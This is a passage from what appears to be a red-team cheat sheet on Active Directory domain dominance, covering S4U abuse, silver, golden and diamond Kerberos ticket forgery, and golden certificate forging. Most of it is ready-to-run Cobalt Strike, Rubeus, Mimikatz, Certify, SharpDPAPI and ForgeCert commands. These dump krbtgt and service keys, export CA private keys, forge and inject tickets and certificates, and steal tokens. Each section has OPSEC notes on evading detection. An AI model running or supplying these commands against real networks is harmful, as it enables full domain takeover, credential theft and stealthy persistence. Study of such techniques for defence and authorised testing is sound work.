beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:ldap/dc01.corp.local /user:dc01$ /ticket:doIFuj[...]lDLklP /nowrap
# ===== REQUEST NEW MACHINE CERTIFICATE (IF NEEDED) =====
# Request machine certificate (requires SYSTEM and enrollment rights)
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc01.corp.local\corp-DC-CA /template:Machine /machine
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Machine certificates provide SYSTEM-level persistence
# - Survives reimaging if certificate backed up
# - Machine certificates typically have longer validity (2-5 years)
# - Very stealthy (legitimate computers use certificates)
Domain Dominance Techniques#
Service Requirements for Tickets#
Common services for Kerberos ticket-based access:
- CIFS (cifs/target.corp.local): File access, remote admin shares
- HOST (host/target.corp.local): Multiple services, WMI, PSRemoting
- HTTP (http/target.corp.local): Web services, WinRM over HTTPS
- LDAP (ldap/dc.corp.local): Directory access, DCSync
- RPCSS (rpcss/target.corp.local): RPC services, DCOM
- WSMAN (wsman/target.corp.local): WinRM/PowerShell remoting
- MSSQLSvc (MSSQLSvc/target.corp.local:1433): SQL Server access
Silver Ticket (Offline Service Ticket Forgery)#
Usage: Create service-specific tickets without contacting the DC.
# ===== PREREQUISITE: OBTAIN SERVICE ACCOUNT KEYS =====
# Extract Kerberos encryption keys (requires local admin on target service host)
beacon> mimikatz !sekurlsa::ekeys
# Look for service account or computer account keys:
# - AES256 (preferred for OPSEC)
# - AES128
# - RC4 (NTLM hash)
# ===== SILVER TICKET CREATION =====
# Method 1: Create silver ticket for CIFS service (file access)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/srv01.corp.local /aes256:<aes256_key> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Method 2: Silver ticket for HTTP service (WinRM)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:http/srv01.corp.local /aes256:<aes256_key> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Method 3: Silver ticket for LDAP (DC access)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:ldap/dc01.corp.local /aes256:<aes256_key> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Method 4: Using Mimikatz (alternative)
beacon> mimikatz kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /target:srv01.corp.local /service:cifs /aes256:<aes256_key> /ptt
# ===== TICKET INJECTION =====
# Create sacrificial logon and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFXD[...]MuaW8=
# Steal token from sacrificial process
beacon> steal_token <pid>
# Verify access to the specific service. Address the host exactly as written in /service (FQDN, not IP or short name) so the SPN the client requests matches the forged ticket
beacon> ls \\srv01.corp.local\C$
# For WinRM
beacon> powerpick Invoke-Command -ComputerName srv01.corp.local -ScriptBlock {hostname}
# For LDAP (DCSync)
beacon> dcsync corp.local CORP\Administrator
# Cleanup: drop the stolen token and kill the sacrificial process so the forged ticket does not linger in a live logon session
beacon> rev2self
beacon> kill <pid>
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Silver tickets are service-specific (limited scope)
# - No contact with DC (fully offline forgery)
# - Valid until the key owner's password changes: computer accounts rotate their password every 30 days by default, so CIFS/HOST/HTTP tickets built from a machine key usually die within a month
# - Service (user) account passwords are rarely changed (months/years), so MSSQLSvc-style tickets built from a service-account key last much longer
# - PAC validation (the service asking a DC to verify the PAC signature) is skipped by services running as SYSTEM or holding SeTcbPrivilege, which is why silver tickets work against them; a service without that privilege validates the PAC and the forgery fails
# - Use AES256 keys for better OPSEC (RC4 is deprecated)
# - Event ID 4769 (TGS request) NOT generated (offline ticket)
# - Event ID 4624 (logon) may occur when ticket used
Golden Ticket (Offline TGT Forgery)#
Usage: Create domain-wide TGT tickets using krbtgt account hash.
# ===== PREREQUISITE: OBTAIN KRBTGT HASH =====
# Method 1: DCSync (requires replication rights)
beacon> dcsync corp.local CORP\krbtgt
# Method 2: Extract from DC locally (requires DA/SYSTEM on DC)
beacon> mimikatz !lsadump::lsa /inject /name:krbtgt
# Output includes:
# - NTLM hash (RC4)
# - AES128 key
# - AES256 key (preferred)
# ===== GOLDEN TICKET CREATION =====
# Create golden ticket offline (on attack machine)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<krbtgt_aes256> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Create golden ticket for a non-existent user (domain admin). NOTE: DCs with the CVE-2021-42287 / KB5008380 PAC requestor hardening in enforcement mode reject TGTs whose PAC does not map to a real account with that RID, so on a patched domain use a real account name and its real RID (/id or /ldap)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<krbtgt_aes256> /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Add custom groups to PAC (512=Domain Admins, 519=Enterprise Admins, 520=Group Policy Creator Owners). 519 is only meaningful when this is the forest-root domain; in a child domain inject the root domain's -519 via /sids instead. Check Rubeus' default /groups set before adding these — it may already include them
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<krbtgt_aes256> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /groups:512,519,520 /nowrap
# Control the lifetime: /endin and /renewmax are minutes, so 43200 = 30 days and 10080 = 7 days (a renewmax shorter than endin is itself odd). mimikatz's 10-year default is an easy detection; prefer values matching domain policy (typically /endin:600 /renewmax:10080)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<krbtgt_aes256> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /startoffset:-10 /endin:43200 /renewmax:10080 /nowrap
# Using Mimikatz (alternative)
beacon> mimikatz kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /aes256:<krbtgt_aes256> /ptt
# ===== TICKET INJECTION =====
# Inject golden ticket into new logon session
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFLz[...]MuaW8=
# Steal token
beacon> steal_token <pid>
# Verify access
beacon> shell klist
beacon> ls \\dc01.corp.local\C$
beacon> dcsync corp.local CORP\krbtgt
# Cleanup: drop the stolen token and kill the sacrificial process so the forged TGT does not linger in a live logon session
beacon> rev2self
beacon> kill <pid>
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Golden tickets provide domain-wide access
# - Valid until the krbtgt password is changed TWICE: the KDC accepts tickets under the current and the previous krbtgt key, so a single reset is not enough (and replication must finish between the two resets)
# - krbtgt password changes are VERY rare (manual process)
# - Forged TGT works for all services (most powerful ticket)
# - No DC contact required (fully offline)
# - Service-side PAC validation does not help against golden tickets: the PAC signature is verified with the krbtgt key the attacker already holds. What does bite is the PAC requestor check (KB5008380, enforced since 2022): the user name and RID in the ticket must match a real account
# - Use AES256 for better OPSEC (matches modern Windows)
# - Anomalous account usage detected by behavior analytics
# - Event ID 4768 (TGT request) NOT generated (offline)
# - Event ID 4769 (TGS request) generated when requesting service tickets
# - Event ID 4624 (logon) when accessing resources
# - Lifetime anomalies may trigger alerts (10-year tickets suspicious)
Diamond Ticket (Online TGT Modification)#
Usage: Create more legitimate-looking tickets by modifying real TGT.
# ===== PREREQUISITE: OBTAIN KRBTGT KEY AND USER SID =====
# Get krbtgt AES256 key
beacon> dcsync corp.local CORP\krbtgt
# Get target user SID and user ID (RID)
beacon> powerpick Get-DomainUser -Identity Administrator | select samaccountname,objectsid
# Extract RID from SID (last part)
# Example: S-1-5-21-569305411-121244042-2357301523-500
# RID = 500
# ===== DIAMOND TICKET CREATION =====
# Request real TGT, then modify it to add privileges
# Method 1: Using /tgtdeleg (requests delegated TGT, then modifies)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /krbkey:<krbtgt_aes256> /nowrap
# Method 2: Same flow for a lower-profile real account (jdoe, RID 1106). /ticketuser and /ticketuserid must be a real account and its actual RID; a mismatch is exactly what DCs with the PAC requestor hardening reject
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:jdoe /ticketuserid:1106 /groups:512,519 /krbkey:<krbtgt_aes256> /nowrap
# Advanced: Inject SID history for cross-domain attacks (e.g. child -> parent, adding the parent domain's -512/-519 SID). Works within a forest; across forest trusts SID filtering strips the injected SIDs
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-2594061375-675613155-814674916-512 /krbkey:<krbtgt_aes256> /nowrap
# ===== INJECT TICKET =====
# Create logon session with diamond ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFYj[...]MuSU8=
beacon> steal_token <pid>
# ===== COMPARE WITH GOLDEN TICKET =====
# Describe diamond ticket (shows real TGT structure)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:doIFYj[...]MuSU8=
# Diamond tickets have:
# - A real KDC-issued TGT as the base: it is decrypted with the krbtgt key, the PAC is edited, then it is re-signed and re-encrypted with the same key (indistinguishable from KDC output)
# - Modified PAC (includes injected groups)
# - The KDC's own timestamps, nonces, session key and flags
# - Proper ticket structure
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Diamond tickets are more legitimate than golden tickets
# - Everything except the PAC comes from the real KDC; the PAC is edited and the ticket re-encrypted with the genuine krbtgt key, so there are no forged-looking lifetimes or missing fields
# - Harder to detect with PAC validation
# - Requires initial TGT request (generates Event ID 4768)
# - Better for evading modern detection systems
# - Use when golden tickets are detected/blocked
# - Still requires krbtgt key (same prerequisite as golden)
Forged Certificates (Golden Certificate)#
Usage: Create malicious certificates using stolen CA private keys.
# ===== PREREQUISITE: EXTRACT CA PRIVATE KEY =====
# Must be executed on the CA server (or a DC hosting the CA role)
# Requires SYSTEM privileges. If the CA key is held in an HSM it cannot be exported this way
# Export CA certificates and private keys
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine
# Output includes:
# - Certificate (Base64)
# - Private Key (Base64)
# Alternative: Use Mimikatz. crypto::capi / crypto::cng only patch the "non-exportable" restriction (CAPI in the current process, CNG via the KeyIso service in LSASS); the export itself is a separate step
beacon> mimikatz !crypto::capi
beacon> mimikatz !crypto::cng
beacon> mimikatz !crypto::certificates /systemstore:local_machine /store:my /export
# Alternative: Certipy (Linux)
$ proxychains certipy ca -u Administrator -p password -target dc01.corp.local -ca corp-DC-CA -backup
# ===== CERTIFICATE CONVERSION =====
# Save certificate and private key to cert.pem
# Convert to PFX format
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out ca.pfx
# Enter password (e.g., "pass123")
# ===== FORGE CERTIFICATE FOR TARGET USER =====
# Use ForgeCert to create a malicious certificate. The SAN UPN must belong to an existing account (PKINIT maps the certificate to the account by UPN).
# NOTE: DCs with the KB5014754 certificate-mapping hardening in Full Enforcement reject certificates that lack the SID extension (szOID_NTDS_CA_SECURITY_EXT) unless an explicit mapping exists; ForgeCert does not add it, so on a patched domain use a forger that embeds the target's SID (e.g. certipy forge ... -sid). Verify the DC's StrongCertificateBindingEnforcement setting first.
PS C:\> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "Administrator@corp.local" --NewCertPath .\forged.pfx --NewCertPassword pass123
# Alternative: another existing account's UPN ("domain-admin@corp.local" is a placeholder — a UPN that resolves to no account will not authenticate)
PS C:\> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "domain-admin@corp.local" --NewCertPath .\forged-da.pfx --NewCertPassword pass123
# Advanced: Forge for computer account
PS C:\> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\ca.pfx --CaCertPassword pass123 --Subject "CN=Computer" --SubjectAltName "DC01$@corp.local" --NewCertPath .\forged-dc.pfx --NewCertPassword pass123
# ===== ENCODE FORGED CERTIFICATE =====
$ base64 -w 0 forged.pfx
# ===== AUTHENTICATE WITH FORGED CERTIFICATE =====
# Request TGT using forged certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:Administrator /domain:corp.local /enctype:aes256 /certificate:MIACAQ[...]IEAAAA /password:pass123 /nowrap
# Inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFLz[...]MuaW8=
beacon> steal_token <pid>
# Verify access
beacon> ls \\dc01.corp.local\C$
beacon> dcsync corp.local CORP\krbtgt
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Forged certificates provide long-term access (years)
# - Requires CA private key (very difficult to obtain)
# - Certificates work even after domain password resets
# - Certificate authentication generates Event ID 4768 with cert details
# - CRL/OCSP cannot catch a forged certificate: it was never issued by the CA, so there is no record to revoke and its serial number is attacker-chosen
# - Detection is by reconciliation: compare the certificate serial/thumbprint in 4768 events against the CA's issued-certificate database (certutil -view); a serial the CA never issued is a forgery
# - Most powerful persistence mechanism (golden certificate)
# - Remediation requires re-keying/re-issuing the CA, removing the old CA certificate from NTAuth and Trusted Root, and re-issuing certificates; revocation alone does nothing against forged certificates